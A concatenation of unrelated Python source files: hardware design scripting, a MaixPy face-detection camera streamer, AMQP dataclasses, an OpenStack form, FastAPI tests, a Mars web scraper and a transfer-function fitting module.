task_st2.insns.append(print_insn)
# call from top (parent module), passing constant 10
top_caller = design_tool.CreateTaskCall(tab_top, task_tab)
top_caller.input_types.append(IValueType(False, 32))
top_st1 = IState(tab_top)
top_st2 = IState(tab_top)
tab_top.initialSt = top_st1
tab_top.states.append(top_st1)
tab_top.states.append(top_st2)
top_call_insn = IInsn(top_caller)
top_arg = design_tool.AllocConstNum(tab_top, False, 32, 10)
top_call_insn.inputs.append(top_arg)
top_st1.insns.append(top_call_insn)
design_tool.AddNextState(top_st1, top_st2)
# call from sibling table (sub), passing constant 12
sub_caller = design_tool.CreateTaskCall(tab_sub, task_tab)
sub_caller.input_types.append(IValueType(False, 32))
sub_st1 = IState(tab_sub)
sub_st2 = IState(tab_sub)
tab_sub.initialSt = sub_st1
tab_sub.states.append(sub_st1)
tab_sub.states.append(sub_st2)
sub_call_insn = IInsn(sub_caller)
sub_arg = design_tool.AllocConstNum(tab_sub, False, 32, 12)
sub_call_insn.inputs.append(sub_arg)
sub_st1.insns.append(sub_call_insn)
design_tool.AddNextState(sub_st1, sub_st2)
# call from sibling module, passing constant 11
sibling_caller = design_tool.CreateTaskCall(tab_sibling, task_tab)
sibling_caller.input_types.append(IValueType(False, 32))
sibling_st1 = IState(tab_sibling)
sibling_st2 = IState(tab_sibling)
tab_sibling.initialSt = sibling_st1
tab_sibling.states.append(sibling_st1)
tab_sibling.states.append(sibling_st2)
sibling_call_insn = IInsn(sibling_caller)
sibling_arg = design_tool.AllocConstNum(tab_sibling, False, 32, 11)
sibling_call_insn.inputs.append(sibling_arg)
sibling_st1.insns.append(sibling_call_insn)
design_tool.AddNextState(sibling_st1, sibling_st2)
# validate ids and emit the design to stdout
design_tool.ValidateIds(d)
DesignWriter(d).Write()
|
import json
import textwrap
from enum import Enum
from jsonify import jsonify
class IssueLevel(Enum):
    """Severity of a bulletin, ordered INFO < WARN < ERR."""
    INFO = 1
    WARN = 2
    ERR = 3

    def __lt__(self, other):
        """Order levels by numeric severity.

        Fixed: comparing against a non-IssueLevel used to raise
        AttributeError (missing ``.value``); now defers via NotImplemented
        so Python can raise a proper TypeError or try the reflected op.
        """
        if not isinstance(other, IssueLevel):
            return NotImplemented
        return self.value < other.value
class Bulletin:
    """A named report item with a severity level, description and payload.

    Identity (hashing/equality) is the bulletin's ``name``; ordering is by
    ``level`` severity.
    """
    # Class-level defaults; __init__ always overwrites them per instance.
    name: str = None
    description: str = None
    data = None
    level: IssueLevel

    def __lt__(self, other):
        """Order bulletins by severity level; defer to foreign types."""
        if not isinstance(other, Bulletin):
            return NotImplemented
        return self.level < other.level

    def __init__(self, name: str, description: str, data, level: IssueLevel):
        self.name = name
        self.description = description
        self.data = data
        self.level = level

    def __hash__(self):
        # Must stay in sync with __eq__ (both key on `name`).
        return hash(self.name)

    def __eq__(self, other):
        # Fixed: comparing against a non-Bulletin used to raise
        # AttributeError (missing `.name`); now defers via NotImplemented
        # so `bulletin == other_thing` correctly evaluates to False.
        if not isinstance(other, Bulletin):
            return NotImplemented
        return self.name == other.name

    def __repr__(self):
        # Boxed, human-readable report: a '=' padded level header and name
        # header, then the wrapped description and JSON-ified data if set.
        n_l = max(len(str(self.level)), len(self.name)+2)
        if n_l % 2 != 0:
            n_l += 1
        lvl_name = str(self.level.name)
        lvl_name_len = len(lvl_name)
        lvl_name_pad = "=" * int((n_l - lvl_name_len)/2)
        lvl_header = f"{lvl_name_pad} {lvl_name} {lvl_name_pad}"
        name = str(self.name)
        name_len = len(name)
        name_pad = "=" * int((n_l - name_len)/2)
        header = f"{name_pad} {name} {name_pad}"
        lines = list()
        lines.append(lvl_header)
        lines.append(header)
        if self.description is not None:
            lines.append("")
            lines.append(textwrap.fill(self.description))
        if self.data is not None:
            lines.append("")
            lines.append(jsonify(self.data))
        lines.append("")
        return "\n".join(lines)
|
from . import settings
from mangopay.api import APIRequest
# Module-level MangoPay API client, configured once from Django settings;
# imported below so mangopay.resources binds to this handler.
handler = APIRequest(client_id=settings.MANGOPAY_CLIENT_ID,
                     passphrase=settings.MANGOPAY_PASSPHRASE,
                     sandbox=settings.MANGOPAY_USE_SANDBOX)
from mangopay.resources import * # noqa
|
import gc
import sys
import time

import image
import KPU as kpu
import lcd
import sensor
from fpioa_manager import fm, board_info
from machine import UART, I2C
from Maix import GPIO
from pmu import axp192
# Refference code anoken 2019
# https://gist.github.com/anoken/8b0ce255e9aef9d1a7f4d46272cedcaa#file-maixpy_unitv-py-L9
#------------------------------------------------------------------------------
# Functions
#------------------------------------------------------------------------------
#def Init():
#------------------------------------------------------------------------------
# Init
#------------------------------------------------------------------------------
# UART initialization
print("\n--- UART Initialize ---")
fm.register(35, fm.fpioa.UART1_TX, force=True)
fm.register(34, fm.fpioa.UART1_RX, force=True)
uart1 = UART(UART.UART1, 115200,8,0,0, timeout=1000, read_buf_len=4096)
# LCD
print("\n--- Lcd Initialize ---")
lcd.init()
lcd.rotation(2)
time.sleep(0.1)
# Power management (PMU)
pmu = axp192()
pmu.setScreenBrightness(10) # flickers at 8, so use 10
time.sleep(0.1)
# Camera initialization: retry reset until the sensor responds
print("\n--- Camera Initialize ---")
while 1:
    try:
        time.sleep(0.01)
        sensor.reset()
        break
    except:
        time.sleep(0.01)
        continue
#sensor.set_hmirror(1)
#sensor.set_vflip(1)
sensor.set_pixformat(sensor.RGB565)
sensor.set_framesize(sensor.QVGA) #QVGA=320x240
#sensor.set_windowing((224, 224))
sensor.run(1)
time.sleep(0.1)
# init KPU: default face-detection model stored in flash
print("\n--- KPU Initialize ---")
task = kpu.load(0x300000) # Load Model File from Flash
anchor = (1.889, 2.5245, 2.9465, 3.94056, 3.99987, 5.3658, 5.155437, 6.92275, 6.718375, 9.01025)
# Anchor data is for bbox, extracted from the training sets.
kpu.init_yolo2(task, 0.5, 0.3, 5, anchor)
#------------------------------------------------------------------------------
# Loop: detect faces, draw boxes on the LCD, stream a compressed JPEG + size
# header over UART whenever at least one face is found.
#------------------------------------------------------------------------------
try:
    print("--- loop ---")
    while(True):
        # Grab a frame from the camera
        img_org = sensor.snapshot()
        # Face detection
        bbox = kpu.run_yolo2(task, img_org) # Run the detection routine
        if bbox:
            # Copy before annotating; the copy is downscaled and
            # JPEG-compressed for transmission
            img_buf = img_org.copy()
            img_buf = img_buf.resize(240,160)
            img_buf.compress(quality=60)
            # Draw the detection rectangles on the original frame
            for i in bbox:
                print(i)
                img_org.draw_rectangle(i.rect())
            # Show on the LCD for checking (camera aspect ratio)
            lcd.display(img_org)
            # Split the compressed image size into three 8-bit chunks
            img_size1 = (img_buf.size()& 0xFF0000)>>16
            img_size2 = (img_buf.size()& 0x00FF00)>>8
            img_size3 = (img_buf.size()& 0x0000FF)>>0
            # 10-byte header packet: magic bytes then the 24-bit payload size
            data_packet = bytearray([0xFF,0xF1,0xF2,0xA1,img_size1,img_size2,img_size3,0x00,0x00,0x00])
            # Send header followed by the JPEG payload
            uart1.write(data_packet)
            uart1.write(img_buf)
            print(img_buf.size())
            #print("",img_buf.size(),",",data_packet)
        # Show the (possibly annotated) frame
        lcd.display(img_org)
        #wait
        time.sleep(0.1)
except KeyboardInterrupt:
    # Release the KPU model before exiting
    a = kpu.deinit(task)
    sys.exit()
|
from __future__ import annotations
from dataclasses import dataclass, field
from enum import Enum
from typing import Dict, List, Optional, Type, TypeVar, Union
from urllib.parse import urlparse
# Value types accepted in AMQP argument tables (x-arguments).
ArgumentsType = Dict[str, Union[str, bool, int]]
class ExchangeType(Enum):
    """Supported AMQP exchange types (the enum value is the wire name)."""
    topic = 'topic'
    direct = 'direct'
    fanout = 'fanout'
@dataclass(frozen=True)
class Exchange:
    """Immutable declarative description of an AMQP exchange."""
    name: str
    type: ExchangeType = ExchangeType.topic
    durable: bool = True
    auto_delete: bool = False
    internal: bool = False
    # Extra broker-specific declaration arguments, passed through verbatim.
    arguments: ArgumentsType = field(default_factory=dict)
@dataclass(frozen=True)
class QueueBinding:
    """Immutable binding of a queue to *exchange* under *routing_key*."""
    exchange: Exchange
    routing_key: str
    # Extra broker-specific binding arguments, passed through verbatim.
    arguments: ArgumentsType = field(default_factory=dict)
@dataclass(frozen=True)
class Queue:
    """Immutable declarative description of an AMQP queue and its bindings."""
    name: str
    bindings: List[QueueBinding] = field(default_factory=list)
    durable: bool = True
    exclusive: bool = False
    auto_delete: bool = False
    # Extra broker-specific declaration arguments, passed through verbatim.
    arguments: ArgumentsType = field(default_factory=dict)
T = TypeVar('T', bound='ConnectionParams')
@dataclass(frozen=True)
class ConnectionParams:
    """Broker connection settings, constructible from an AMQP URI."""
    host: str = 'localhost'
    port: int = 5672
    username: str = 'guest'
    password: str = 'guest'
    virtual_host: Optional[str] = '/'

    @classmethod
    def from_string(cls: Type[T], connection_string: str) -> T:
        """Build connection params from ``amqp://user:pass@host:port/vhost``.

        Missing URI components fall back to the class defaults, except the
        virtual host, which becomes ``None`` when the URI has no path.

        Raises:
            ValueError: if the URI scheme is not ``amqp``.
        """
        parse_result = urlparse(connection_string)
        # Fixed: was `assert`, which silently disappears under `python -O`;
        # input validation must raise unconditionally.
        if parse_result.scheme != 'amqp':
            raise ValueError('Scheme must be amqp')
        return cls(
            host=parse_result.hostname or cls.host,
            port=int(parse_result.port) if parse_result.port else cls.port,
            username=parse_result.username or cls.username,
            password=parse_result.password or cls.password,
            virtual_host=parse_result.path[1:] if parse_result.path else None
        )
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard.api import cinder
# This set of states was pulled from cinder's snapshot_actions.py
# (value, translated label) pairs offered in the status dropdown.
STATUS_CHOICES = (
    ('available', _('Available')),
    ('creating', _('Creating')),
    ('deleting', _('Deleting')),
    ('error', _('Error')),
    ('error_deleting', _('Error Deleting')),
)
def populate_status_choices(initial, status_choices):
    """Return *status_choices* minus the snapshot's current status,
    with a blank "Select a new status" placeholder prepended."""
    current = initial.get('status')
    selectable = [choice for choice in status_choices if choice[0] != current]
    return [("", _("Select a new status"))] + selectable
class UpdateStatus(forms.SelfHandlingForm):
    """Admin form that force-resets a volume snapshot's status via cinder."""

    status = forms.ThemableChoiceField(label=_("Status"))

    def __init__(self, request, *args, **kwargs):
        super(UpdateStatus, self).__init__(request, *args, **kwargs)
        # Offer every status except the snapshot's current one.
        self.fields['status'].choices = populate_status_choices(
            kwargs.get('initial', {}), STATUS_CHOICES)

    def handle(self, request, data):
        try:
            cinder.volume_snapshot_reset_state(request,
                                               self.initial['snapshot_id'],
                                               data['status'])
            label = dict(STATUS_CHOICES)[data['status']]
            messages.success(request, _('Successfully updated volume snapshot'
                                        ' status: "%s".') % label)
            return True
        except Exception:
            exceptions.handle(request,
                              _('Unable to update volume snapshot status.'),
                              redirect=reverse("horizon:admin:volumes:index"))
|
# Print a**0 .. a**b reduced modulo m (here: successive powers of 2 mod 8).
a = 2
b = 7
m = 8
# Three-argument pow computes each modular power directly.
for exponent in range(b):
    print(pow(a, exponent, m))
p = pow(a, b, m)
print(p)
import unittest
from p2bf.builder import BFBuild
from p2bf.emitter import Emitter
import StringIO
from util.run_bf import run
class TestVariableAssignment(unittest.TestCase):
    """Compile small Python assignment snippets to brainfuck and run them.

    Each test only checks that emission and execution complete without
    raising; no output is asserted.
    """

    def _compile_and_run(self, python_src):
        """Emit brainfuck for *python_src*, execute it, and return the
        (emitted code, program output) StringIO buffers."""
        emit_output = StringIO.StringIO()
        run_output = StringIO.StringIO()
        emitter = Emitter(stdout=emit_output)
        BFBuild(python_src, emit=emitter).emit_bf()
        run(emit_output.getvalue(), stdout=run_output)
        return emit_output, run_output

    def test_single_assignment(self):
        self._compile_and_run("""v1 = "a" """)

    def test_multi_assignment(self):
        self._compile_and_run("""v3 = v2 = v1 = "a" """)

    def test_variable_to_variable(self):
        self._compile_and_run("""v1 = "a"\nv2 = v1 """)

    def test_setting_integer(self):
        # The old version declared an unused ``memory_space`` list; dropped.
        self._compile_and_run("""v1 = 57 """)
|
from fastapi.testclient import TestClient
from docs_src.dataclasses.tutorial003 import app
# Shared test client bound to the tutorial app under test.
client = TestClient(app)
# Expected OpenAPI document for the tutorial app; compared verbatim against
# GET /openapi.json in test_openapi_schema below.
openapi_schema = {
    "openapi": "3.0.2",
    "info": {"title": "FastAPI", "version": "0.1.0"},
    "paths": {
        "/authors/{author_id}/items/": {
            "post": {
                "summary": "Create Author Items",
                "operationId": "create_author_items_authors__author_id__items__post",
                "parameters": [
                    {
                        "required": True,
                        "schema": {"title": "Author Id", "type": "string"},
                        "name": "author_id",
                        "in": "path",
                    }
                ],
                "requestBody": {
                    "content": {
                        "application/json": {
                            "schema": {
                                "title": "Items",
                                "type": "array",
                                "items": {"$ref": "#/components/schemas/Item"},
                            }
                        }
                    },
                    "required": True,
                },
                "responses": {
                    "200": {
                        "description": "Successful Response",
                        "content": {
                            "application/json": {
                                "schema": {"$ref": "#/components/schemas/Author"}
                            }
                        },
                    },
                    "422": {
                        "description": "Validation Error",
                        "content": {
                            "application/json": {
                                "schema": {
                                    "$ref": "#/components/schemas/HTTPValidationError"
                                }
                            }
                        },
                    },
                },
            }
        },
        "/authors/": {
            "get": {
                "summary": "Get Authors",
                "operationId": "get_authors_authors__get",
                "responses": {
                    "200": {
                        "description": "Successful Response",
                        "content": {
                            "application/json": {
                                "schema": {
                                    "title": "Response Get Authors Authors Get",
                                    "type": "array",
                                    "items": {"$ref": "#/components/schemas/Author"},
                                }
                            }
                        },
                    }
                },
            }
        },
    },
    "components": {
        "schemas": {
            "Author": {
                "title": "Author",
                "required": ["name"],
                "type": "object",
                "properties": {
                    "name": {"title": "Name", "type": "string"},
                    "items": {
                        "title": "Items",
                        "type": "array",
                        "items": {"$ref": "#/components/schemas/Item"},
                    },
                },
            },
            "HTTPValidationError": {
                "title": "HTTPValidationError",
                "type": "object",
                "properties": {
                    "detail": {
                        "title": "Detail",
                        "type": "array",
                        "items": {"$ref": "#/components/schemas/ValidationError"},
                    }
                },
            },
            "Item": {
                "title": "Item",
                "required": ["name"],
                "type": "object",
                "properties": {
                    "name": {"title": "Name", "type": "string"},
                    "description": {"title": "Description", "type": "string"},
                },
            },
            "ValidationError": {
                "title": "ValidationError",
                "required": ["loc", "msg", "type"],
                "type": "object",
                "properties": {
                    "loc": {
                        "title": "Location",
                        "type": "array",
                        "items": {"anyOf": [{"type": "string"}, {"type": "integer"}]},
                    },
                    "msg": {"title": "Message", "type": "string"},
                    "type": {"title": "Error Type", "type": "string"},
                },
            },
        }
    },
}
def test_openapi_schema():
    """The generated OpenAPI document matches the expected schema verbatim."""
    resp = client.get("/openapi.json")
    assert resp.status_code == 200
    assert resp.json() == openapi_schema
def test_post_authors_item():
    """Posting items echoes them back under the author, filling defaults."""
    payload = [
        {"name": "Bar"},
        {"name": "Baz", "description": "Drop the Baz"},
    ]
    resp = client.post("/authors/foo/items/", json=payload)
    assert resp.status_code == 200
    assert resp.json() == {
        "name": "foo",
        "items": [
            {"name": "Bar", "description": None},
            {"name": "Baz", "description": "Drop the Baz"},
        ],
    }
def test_get_authors():
    """GET /authors/ returns the tutorial app's hard-coded author list."""
    expected = [
        {
            "name": "Breaters",
            "items": [
                {
                    "name": "Island In The Moon",
                    "description": "A place to be be playin' and havin' fun",
                },
                {"name": "Holy Buddies", "description": None},
            ],
        },
        {
            "name": "System of an Up",
            "items": [
                {
                    "name": "Salt",
                    "description": "The kombucha mushroom people's favorite",
                },
                {"name": "Pad Thai", "description": None},
                {
                    "name": "Lonely Night",
                    "description": "The mostests lonliest nightiest of allest",
                },
            ],
        },
    ]
    resp = client.get("/authors/")
    assert resp.status_code == 200
    assert resp.json() == expected
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
# Dependencies
from bs4 import BeautifulSoup as bs
from splinter import Browser
import time
import pandas as pd
import requests
from webdriver_manager.chrome import ChromeDriverManager
# In[2]:
# Initialize Browser
def init_browser():
    """Launch a visible Chrome browser driven by splinter."""
    driver_path = ChromeDriverManager().install()
    return Browser("chrome", executable_path=driver_path, headless=False)
# In[3]:
# Scrape News Headline
def scrape_news():
    """Return [title, teaser] of the latest article on redplanetscience.com."""
    browser = init_browser()
    browser.visit('https://redplanetscience.com/')
    time.sleep(2)  # give the dynamic page time to render
    soup = bs(browser.html, 'html.parser')
    title = soup.find('div', class_='content_title').text
    teaser = soup.find('div', class_='article_teaser_body').text
    browser.quit()
    return [title, teaser]
#print(scrape_news())
# In[4]:
# Scrape Featured Image
def scrape_image():
    """Return the absolute URL of the currently featured Mars image."""
    base_url = 'https://spaceimages-mars.com'
    browser = init_browser()
    browser.visit(base_url)
    time.sleep(2)  # give the dynamic page time to render
    soup = bs(browser.html, 'html.parser')
    # The second <img> on the page is the featured image.
    rel_path = soup.find_all('img')[1]['src']
    browser.quit()
    return base_url + "/" + rel_path
#print(scrape_image())
# In[16]:
# Scrape Mars Facts Table
# Visit the Mars Facts webpage (https://galaxyfacts-mars.com) and use Pandas
# to scrape the table containing facts about the planet (Diameter, Mass, ...),
# returning it as an HTML table string.
def scrape_facts():
    """Scrape the Mars-vs-Earth comparison table and return it as HTML."""
    facts_df = pd.read_html('https://galaxyfacts-mars.com')[0]
    facts_df = facts_df.iloc[1:]  # drop the duplicated header row
    facts_df.columns = ['Description', 'Mars', 'Earth']
    return facts_df.set_index('Description').to_html()
#print(scrape_facts())
# In[ ]:
## Scrape Mars Hemisphere Images
# Step 1 - Get hemisphere titles containing the hemisphere name with Beautiful Soup
# Step 2 - Get image url string for the full resolution hemisphere images
# using Splinter
def scrape_hemispheres():
    """Scrape title and full-resolution image URL for the four Mars hemispheres.

    Returns
    -------
    list of dict
        One ``{"title": ..., "img_url": ...}`` per hemisphere.
    """
    base_url = 'https://marshemispheres.com/'
    # Step 1: hemisphere titles come from the landing page (no browser needed).
    response = requests.get(base_url)
    # was bs(response.text, 'html'): 'html' is not a parser name, so bs4 fell
    # back to a platform-dependent default with a warning.
    soup_index = bs(response.text, 'html.parser')
    headers = soup_index.find_all('h3')
    # Keep only the 4 hemisphere headers (5th is "Back") and strip the
    # trailing " Enhanced" suffix (last 9 characters).
    titles = [header.text[:-9] for header in headers[:4]]
    # Step 2: follow each detail page and grab the full-resolution image link.
    detail_pages = [base_url + page for page in
                    ('cerberus.html', 'schiaparelli.html',
                     'syrtis.html', 'valles.html')]
    browser = init_browser()
    image_urls = []
    for page_url in detail_pages:  # no longer shadows the landing-page URL
        browser.visit(page_url)
        time.sleep(2)  # give the dynamic page time to render
        soup_detail = bs(browser.html, 'html.parser')
        links = [a['href'] for a in soup_detail.find_all('a', href=True)]
        # The 4th anchor on each detail page points at the full-size image.
        image_urls.append(base_url + links[3])
    browser.quit()
    return [{"title": title, "img_url": img_url}
            for title, img_url in zip(titles, image_urls)]
#print(scrape_hemispheres())
# In[ ]:
# Bring everything together into one dictionary
mars_data = {}
def scrape():
    """Run every scraper and collect the results into the module-level dict."""
    mars_data.update(
        news=scrape_news(),
        featured_image=scrape_image(),
        facts=scrape_facts(),
        hemispheres=scrape_hemispheres(),
    )
    return mars_data
#print(scrape())
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: Apache-2.0
# SPDX-FileCopyrightText: © 2021 Massachusetts Institute of Technology.
# SPDX-FileCopyrightText: © 2021 Lee McCuller <mcculler@mit.edu>
# NOTICE: authors should document their contributions concisely in NOTICE
# with details inline in source files, comments, and docstrings.
"""
"""
import numpy as np
from wavestate.bunch import Bunch
from ... import TFmath
from ... import representations
from ...utilities import ensure_aid
from ...fitters_ZPK.ZPKrep2MRF import ZP2codings
def resrank_program(
    fitter,
    rank_zp_idx_list,
    name,
    program,
    variant=None,
    marginalize_delay=True,
    **kwargs
):
    """Score ("rank") a candidate pole/zero edit *program* against *fitter*.

    The program is a flat list encoding (op, arg) pairs, consumed from the
    end (``pop`` twice per step yields arg then op).  Roots the program would
    delete are collected directly; roots it would add are collected on the
    opposite side (pole<->zero) so that a single rational factor represents
    undoing the program's effect on the fit.  The residual of the current
    fit divided by that factor is then scored; the resulting Bunch is
    appended to *rank_zp_idx_list* and returned.

    Parameters are left untyped as in the rest of this module; *kwargs*
    fields are copied onto the returned Bunch.
    """
    # Current roots of the fit: .c complex-conjugate pairs, .r real roots.
    Pc = fitter.poles.c
    Zc = fitter.zeros.c
    Pr = fitter.poles.r
    Zr = fitter.zeros.r
    Pc_mod = []
    Pr_mod = []
    Zc_mod = []
    Zr_mod = []
    program_copy = list(program)
    while program_copy:
        arg = program_copy.pop()
        which = program_copy.pop()
        if which == "PcDelIdx":
            Pc_mod.append(Pc[arg])
        elif which == "ZcDelIdx":
            Zc_mod.append(Zc[arg])
        elif which == "PrDelIdx":
            Pr_mod.append(Pr[arg])
        elif which == "ZrDelIdx":
            Zr_mod.append(Zr[arg])
        # swap on these since they are added
        elif which == "PrAdd":
            Zr_mod.append(arg)
        elif which == "ZrAdd":
            Pr_mod.append(arg)
        elif which == "PcAdd":
            Zc_mod.append(arg)
        elif which == "ZcAdd":
            Pc_mod.append(arg)
    # Evaluate the removed-roots factor on the fit frequency grid, poles
    # then zeros (the zero pass inverts via h=1/h, lnG=-lnG).
    PrB = representations.asMRRB(c=Pc_mod, r=Pr_mod)
    ZrB = representations.asMRRB(c=Zc_mod, r=Zr_mod)
    h, lnG = PrB.val_lnG(fitter.F_Hz)
    h, lnG = ZrB.val_lnG(fitter.F_Hz, h=1 / h, lnG=-lnG)
    # Residual ratio of the modified fit against the data.
    R = fitter.xfer_fit / (fitter.data * h)
    # this is the exact solution for the gain adjustment required, using the DualB
    # residuals
    G = (
        np.sum(fitter.W ** 2 / TFmath.abs_sq(R))
        / np.sum(fitter.W ** 2 * TFmath.abs_sq(R))
    ) ** 0.25
    R = G * R
    rank = np.sum(TFmath.abs_sq(fitter.residuals_NLmap(R, W=fitter.W)))
    if marginalize_delay:
        # linear detrends the phasing term to remove delay effects
        f = fitter.F_Hz
        # the factor of 2 is not with the exact solution, but seems to work better
        R.imag -= (
            f * np.sum(f * R.imag * fitter.W ** 2) / np.sum(f ** 2 * fitter.W ** 2) / 2
        )
        rank_moddelay = np.sum(TFmath.abs_sq(fitter.residuals_NLmap(R, W=fitter.W)))
        # Keep whichever score (with or without delay marginalization) is better.
        rank = min(rank, rank_moddelay)
    pbunch = Bunch(**kwargs)
    pbunch.rank = rank
    pbunch.name = name
    pbunch.variant = variant
    pbunch.program = program
    rank_zp_idx_list.append(pbunch)
    return pbunch
def ranking_reduction_trials(
    aid,
    rank_zp_idx_list,
    num_total_max=4,
    num_type_max=2,
    num_try2=2,
    ranking_factor_max=None,
    greedy=False,
    return_remaining=False,
    reset_delay=True,
):
    """Turn the best-ranked reduction programs into trial fitters and optimize them.

    Walks *rank_zp_idx_list* (Bunches produced by ``resrank_program``),
    selects up to *num_total_max* candidates (at most *num_type_max* per
    program name, optionally bounded by *ranking_factor_max* relative to the
    best rank seen), applies each program to the current fitter's roots and
    optimizes the resulting trial.  The *num_try2* best non-improving trials
    get a second, annealed optimization pass.

    Returns the list of trials sorted by residual average; when
    *return_remaining* is True, also returns the unconsumed tail of
    *rank_zp_idx_list*.  With *greedy*, stops at the first improving trial.
    """
    aid = ensure_aid(aid)
    if not rank_zp_idx_list:
        if return_remaining:
            return [], rank_zp_idx_list
        else:
            return []
    type_count = dict()
    num_total = 0
    idx_total = 0
    trials = []
    trials_try1 = []
    trials_try2 = []
    ranks_original = []
    minranking = float("inf")
    aid.log_progress(6, "trials started")
    for pbunch in rank_zp_idx_list:
        idx_total += 1
        if ranking_factor_max is not None and (
            pbunch.rank > minranking * ranking_factor_max
        ):
            continue
        if pbunch.rank < minranking:
            minranking = pbunch.rank
        count = type_count.get(pbunch.name, 0) + 1
        if num_type_max is not None and count > num_type_max:
            continue
        type_count[pbunch.name] = count
        num_total += 1
        if num_total_max is not None and num_total > num_total_max:
            break
        ranks_original.append(pbunch.rank)
        Pc_mod = list(aid.fitter.poles.c)
        Zc_mod = list(aid.fitter.zeros.c)
        Pr_mod = list(aid.fitter.poles.r)
        Zr_mod = list(aid.fitter.zeros.r)
        Pc_idx_remove = set()
        Zc_idx_remove = set()
        Pr_idx_remove = set()
        Zr_idx_remove = set()
        Pc_new = []
        Zc_new = []
        Pr_new = []
        Zr_new = []
        # work backward on the command sequence removing the idxs
        trial = Bunch()
        trial.prog_redux = []
        trial.ord_ch = 0  # net change in filter order (complex pairs count 2)
        trial.pbunch = pbunch
        program = list(pbunch.program)
        while program:
            arg = program.pop()
            which = program.pop()
            trial.prog_redux.append(which)
            if which == "PcDelIdx":
                trial.prog_redux.append(Pc_mod[arg])
                trial.ord_ch -= 2
                Pc_idx_remove.add(arg)
            elif which == "ZcDelIdx":
                trial.prog_redux.append(Zc_mod[arg])
                trial.ord_ch -= 2
                Zc_idx_remove.add(arg)
            elif which == "PrDelIdx":
                trial.prog_redux.append(Pr_mod[arg])
                trial.ord_ch -= 1
                Pr_idx_remove.add(arg)
            elif which == "ZrDelIdx":
                trial.prog_redux.append(Zr_mod[arg])
                trial.ord_ch -= 1
                Zr_idx_remove.add(arg)
            elif which == "PrAdd":
                trial.prog_redux.append(arg)
                trial.ord_ch += 1
                Pr_new.append(arg)
            elif which == "ZrAdd":
                trial.prog_redux.append(arg)
                trial.ord_ch += 1
                Zr_new.append(arg)
            elif which == "PcAdd":
                trial.prog_redux.append(arg)
                trial.ord_ch += 2
                Pc_new.append(arg)
            elif which == "ZcAdd":
                trial.prog_redux.append(arg)
                trial.ord_ch += 2
                Zc_new.append(arg)
        # Delete from the highest index down so earlier indices stay valid.
        for idx in reversed(sorted(Pc_idx_remove)):
            del Pc_mod[idx]
        for idx in reversed(sorted(Zc_idx_remove)):
            del Zc_mod[idx]
        for idx in reversed(sorted(Pr_idx_remove)):
            del Pr_mod[idx]
        for idx in reversed(sorted(Zr_idx_remove)):
            del Zr_mod[idx]
        if trial.ord_ch == 0:
            trial.ord_str = "OrdC"
        elif trial.ord_ch < 0:
            trial.ord_str = "OrdDn"
        else:
            trial.ord_str = "OrdUp"
        coding_map, num_codings_mod, den_codings_mod = ZP2codings(
            aid.fitter,
            zeros=representations.asMRRB(r=Zr_mod, c=Zc_mod),
            poles=representations.asMRRB(r=Pr_mod, c=Pc_mod),
        )
        coding_map, num_codings_new, den_codings_new = ZP2codings(
            aid.fitter,
            zeros=representations.asMRRB(r=Zr_new, c=Zc_new),
            poles=representations.asMRRB(r=Pr_new, c=Pc_new),
            coding_map=coding_map,
        )
        fitter = coding_map.mrf_default(
            parent=aid.fitter,
            num_codings=num_codings_mod + num_codings_new,
            den_codings=den_codings_mod + den_codings_new,
        )
        trial.fitter = fitter
        # BUGFIX: both attributes were previously assigned
        # ``num_codings_mod + den_codings_new`` (mixing the retained
        # numerator with the newly added denominator).  Pair mod with mod
        # and new with new, matching the mrf_default call above.
        trial.codings_mod = num_codings_mod + den_codings_mod
        trial.codings_new = num_codings_new + den_codings_new
        trial.rank_original = pbunch.rank
        trials_try1.append(trial)
    def trial_optimize(trial):
        """First-pass optimization of a trial fitter (gain, then all codings)."""
        fitter = trial.fitter
        try:
            with fitter.with_codings_only([fitter.gain_coding]):
                fitter.optimize()
        except Exception as e:
            aid.log_debug(9, "Optimize Exception", e)
        try:
            # anneal by moving the original codings first
            if trial.codings_new:
                with fitter.with_codings_only(trial.codings_mod):
                    fitter.optimize()
            if reset_delay:
                aid.fitter.delay_s = aid.hint("delay_s")
            fitter.optimize()
        except Exception as e:
            aid.log_debug(9, "Optimize Exception", e)
            trial.improved = False
            return trial
        # BUGFIX: previously read the loop variable ``pbunch`` (late-bound
        # to the last candidate) instead of this trial's own bunch.
        if trial.pbunch.variant is not None:
            ord_str = trial.pbunch.variant
        else:
            ord_str = trial.ord_str
        improved = aid.fitter_check(
            fitter,
            variant=ord_str,
            update=False,
            validate=False,
        )
        trial.improved = improved
        return trial
    mt = aid.hint("multithreading", None)
    if mt is not None and mt > 1:
        import multiprocessing.pool
        pool = multiprocessing.pool.ThreadPool(
            processes=mt,
        )
        trial_map = pool.imap_unordered
    else:
        trial_map = map
    improved = False
    for trial in trial_map(trial_optimize, trials_try1):
        # BUGFIX: log this trial's rank, not the stale loop variable's.
        aid.log(8, "Reducing Program", trial.pbunch.rank, trial.prog_redux)
        # Both branches appended to trials_try2 before; collapsed.
        if trial.improved:
            improved = True
        trials_try2.append(trial)
        trials.append(trial)
        if greedy and trial.improved:
            break
    aid.log_progress(7, "trials annealing")
    def trial_optimize_anneal(trial):
        """Second-pass annealed optimization for trials that did not improve."""
        fitter = trial.fitter
        # TODO fix
        from . import algorithms
        if not algorithms.optimize_anneal(aid, fitter):
            return trial
        improved = aid.fitter_check(
            fitter,
            variant=trial.ord_str,
            update=False,
            validate=False,
        )
        trial.improved = improved
        return trial
    if not (greedy and improved):
        trials_try2.sort(key=lambda trial: trial.fitter.residuals_average)
        for trial in trial_map(trial_optimize_anneal, trials_try2[:num_try2]):
            if greedy and trial.improved:
                break
    trials.sort(key=lambda trial: trial.fitter.residuals_average)
    if not return_remaining:
        return trials
    else:
        return trials, rank_zp_idx_list[idx_total:]
|
'''
Problem description:
Welcome.
In this kata you are required to, given a string, replace every letter with its position in the alphabet.
If anything in the text isn't a letter, ignore it and don't return it.
"a" = 1, "b" = 2, etc.
Example
